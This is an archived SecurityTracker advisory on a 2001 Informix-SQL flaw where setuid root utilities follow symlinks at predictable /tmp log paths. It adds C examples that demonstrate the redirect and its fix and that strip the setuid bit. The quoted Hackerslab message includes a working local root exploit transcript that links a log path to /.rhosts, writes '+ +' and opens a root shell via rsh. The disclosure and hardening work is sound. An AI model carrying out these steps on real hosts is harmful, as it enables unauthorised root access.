SecurityTracker.com

SecurityTracker Archives

Category:   Application (Database)  >   Informix
Vendors:   IBM
Informix-SQL Database Application Lets Local Users Write to Files on the System with Root Level Privileges
SecurityTracker Alert ID:  1002347
SecurityTracker URL:  http://securitytracker.com/id/1002347
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Sep 14 2001
Original Entry Date:  Sep 8 2001
Impact:   Modification of system information, Root access via local system

Version(s): 7.31.UC5, possibly others
Description:   Hackerslab reported a vulnerability in Informix-SQL that allows a local user to create or overwrite files on the host with root-level privileges, potentially giving the user root-level access on the host.

The application ships several set-user-ID (setuid) root programs that let a local user create any file with root privileges. The affected setuid files are onbar_d, ondblog, onsmsync, and onsrvapd, all located in the bin directory under the Informix home directory (~informix/bin). These utilities create log files in /tmp under predictable names, so a local user can place a symbolic link at the predictable path pointing to another file on the system. When a utility is executed, it follows the link and writes to the linked file with root-level privileges.

A demonstration exploit transcript is provided in the Source Message.
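The following C program is an added example, not code from the advisory, from Hackerslab or from Informix. It reproduces the mechanism described above on a throwaway symlink (an append to a fixed, predictable path that follows a planted link) and places the hardened open(2) call beside it. The file names victim_file and demo_bar_act.log, and the functions log_append_unsafe, log_create_safe, file_size and demo, are this example's own constructions.

```c
/* Added example, not code from the advisory, from Hackerslab or from Informix:
 * reproduces the file redirect the advisory describes in a plain C program and
 * shows the open(2) flags that prevent it.  All file names are constructed. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the advisory describes: a privileged program appends to a fixed,
 * predictable log path.  open(2) follows a symbolic link at that path, so
 * whatever the link points at receives the write with the caller's privileges. */
int log_append_unsafe(const char *path, const char *msg)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0666);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened variant.  O_CREAT|O_EXCL fails with EEXIST if anything, including
 * a symlink, already sits at the path; O_NOFOLLOW fails with ELOOP on a
 * symlink even without O_EXCL.  Mode 0600 keeps the new file private. */
int log_create_safe(const char *path, const char *msg)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;          /* errno is EEXIST or ELOOP when a link was planted */
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Size of the file at PATH (following symlinks), or -1 on error. */
long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) < 0 ? -1 : (long)st.st_size;
}

/* Plant a symlink from a predictable log name to a separate target file inside
 * DIR, then run both writers against the link.  Returns 0 when the unsafe
 * writer changed the target and the hardened writer refused, i.e. when the
 * behaviour in the advisory is reproduced and the fix is confirmed. */
int demo(const char *dir)
{
    char target[512], linkpath[512];
    snprintf(target, sizeof target, "%s/victim_file", dir);          /* constructed */
    snprintf(linkpath, sizeof linkpath, "%s/demo_bar_act.log", dir); /* constructed */

    unlink(target);
    unlink(linkpath);
    int fd = open(target, O_WRONLY | O_CREAT, 0600);
    if (fd < 0)
        return 1;
    close(fd);
    if (symlink(target, linkpath) < 0)
        return 1;

    long before = file_size(target);
    int unsafe_rc = log_append_unsafe(linkpath, "written through the link\n");
    long after = file_size(target);
    int safe_rc = log_create_safe(linkpath, "never written\n");
    int safe_errno = errno;

    unlink(linkpath);
    unlink(target);

    if (unsafe_rc != 0 || after <= before)
        return 2;   /* the redirect did not happen: unexpected */
    if (safe_rc == 0)
        return 3;   /* the hardened open went through: unexpected */
    if (safe_errno != EEXIST && safe_errno != ELOOP)
        return 4;
    return 0;
}

int main(void)
{
    int rc = demo("/tmp");
    if (rc == 0)
        puts("redirect reproduced; hardened open refused the planted link");
    else
        printf("unexpected result (%d)\n", rc);
    return rc;
}
```

Exit status 0 means the append through the link landed in the target file while the O_EXCL|O_NOFOLLOW open failed with EEXIST or ELOOP. For files that really are temporary, mkstemp(3) (unpredictable name, mode 0600, exclusive creation) is the standard replacement for a fixed /tmp name; for a persistent log written by a root-owned utility, keeping it in a directory that is not world-writable removes the precondition altogether.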

Impact:   A local user can create any file with root level privileges, giving the local user root level access on the host.
Solution:   No vendor solution was available at the time of this entry.

The author of the report provides a workaround, which removes the setuid bit from the affected Informix files:

$ su -
# cd ~informix/bin (Informix HOME Directory)
# chmod o-s onbar_d ondblog onsmsync onsrvapd
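As an added example (not code from the advisory or from Informix), the C program below applies the workaround programmatically and, more importantly, re-reads the mode afterwards to confirm the set-user-ID bit is really gone. The functions is_setuid, strip_setuid and harden_dir are this example's own; the four file names are those listed in the advisory, and the directory is taken from the command line. Note that in symbolic chmod mode the s permission refers to the set-user-ID bit only through u and to the set-group-ID bit only through g (GNU chmod treats o-s as having no effect), so a check after the change is worth having.

```c
/* Added example, not code from the advisory or from Informix: clears the
 * set-user-ID and set-group-ID bits on a list of files and verifies the result
 * by re-reading the mode, so a change that silently did nothing is reported. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* 1 if PATH is a regular file with the set-user-ID bit set, 0 if not, -1 on error. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) < 0)
        return -1;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID)) ? 1 : 0;
}

/* Clear S_ISUID and S_ISGID on PATH, leaving the other permission bits as they
 * are.  Returns 0 only if the bit is confirmed clear afterwards; -1 otherwise
 * (for example when the caller is neither the owner nor root). */
int strip_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) < 0)
        return -1;
    mode_t wanted = (st.st_mode & 07777) & ~(S_ISUID | S_ISGID);
    if (chmod(path, wanted) < 0)
        return -1;
    /* Re-check rather than trust the return value: the point of the
     * workaround is the bit being gone, not the command having run. */
    return is_setuid(path) == 0 ? 0 : -1;
}

/* Apply strip_setuid to each of COUNT NAMES inside DIR.  Returns the number
 * of files that still carry the set-user-ID bit afterwards (0 = success). */
int harden_dir(const char *dir, const char *const names[], int count)
{
    int still = 0;
    char path[1024];
    for (int i = 0; i < count; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        int before = is_setuid(path);
        if (before < 0) {
            fprintf(stderr, "%s: cannot stat\n", path);
            continue;
        }
        if (before == 0) {
            printf("%s: not setuid, nothing to do\n", path);
            continue;
        }
        if (strip_setuid(path) != 0) {
            fprintf(stderr, "%s: still setuid after chmod\n", path);
            still++;
        } else {
            printf("%s: setuid bit removed\n", path);
        }
    }
    return still;
}

int main(int argc, char **argv)
{
    /* File names as listed in the advisory; the directory (~informix/bin on a
     * real host) is passed as the first argument, defaulting to the cwd. */
    static const char *const names[] = { "onbar_d", "ondblog", "onsmsync", "onsrvapd" };
    const char *dir = argc > 1 ? argv[1] : ".";
    return harden_dir(dir, names, 4) == 0 ? 0 : 1;
}
```

Run it as root against the Informix bin directory; a non-zero exit status means at least one of the listed files is still set-user-ID and the host remains exposed.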

Vendor URL:  www.informix.com/
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


Source Message Contents

Subject:  [ Hackerslab bug_paper ] Informix-SQL application vulnerability


==============================================================================

       [ Hackerslab bug_paper ] Informix-SQL application vulnerability

==============================================================================

File   : Informix-SQL application

SYSTEM : Systems running Informix

INFO :

There is a vulnerability in the Informix-SQL application which allows local
users to create any file with root privilege:

PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5   
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x   1 root     informix 2234104 Nov 18  1999 onbar_d
-rwsr-sr-x   1 root     informix 2219456 Nov 18  1999 ondblog
-rwsr-sr-x   1 root     informix 2284972 Apr 10  2000 onsmsync
-rwsr-sr-x   1 root     informix   39144 Nov 18  1999 onsrvapd

$ ./onbar_d   or ./ondblog  or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw----   1 root     informix     557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw----   1 root     informix       0 Aug 29 17:26 /tmp/bar_dbug.log


PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw-   1 root     informix     141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw-   1 informix informix     319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx   1 root     root        1085 Aug 29 17:43 /tmp/snmpd.log


PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw-   1 root     informix     141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root


SOLUTION :

Remove setuid permission, contact your vendor and get a patch.
$ su -
# cd ~informix/bin  (Informix HOME Directory)
# chmod o-s onbar_d  ondblog  onsmsync  onsrvapd


==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *                                               Kim Yong-Jun
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==


 
 


Copyright 2020, SecurityGlobal.net LLC